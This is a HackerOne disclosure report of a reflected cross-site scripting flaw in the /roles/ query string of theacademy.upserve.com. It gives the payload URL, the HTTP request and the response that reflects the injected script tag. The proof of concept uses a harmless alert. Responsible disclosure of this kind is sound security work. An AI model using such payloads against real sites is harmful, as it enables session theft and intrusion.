Upserve : [theacademy.upserve.com] Reflected XSS Query-String

2018-08-02T11:35:23
ID H1:389592
Type hackerone
Reporter bobrov
Modified 2018-10-19T13:24:44

Description

Steps To Reproduce: Open URL in FireFox: https://theacademy.upserve.com/roles/?%22%3E%3Cscript//src=data:,alert(location)//

HTTP Request http GET /roles/?%22%3E%3Cscript//src=data:,alert(location)// HTTP/1.1 Host: theacademy.upserve.com

HTTP Response html <a class="category dropdown-item name-sort sorting-desc" href="/roles/?"><script//src=data:,alert(location)//&orderby=name&order=DESC">Name</a> <a class="category dropdown-item views-sort " href="/roles/?"><script//src=data:,alert(location)//&orderby=views&order=DESC" >Views</a> <a class="category dropdown-item duration-sort " href="/roles/?"><script//src=data:,alert(location)//&orderby=duration&order=DESC">Duration</a>

Impact

Reflected XSS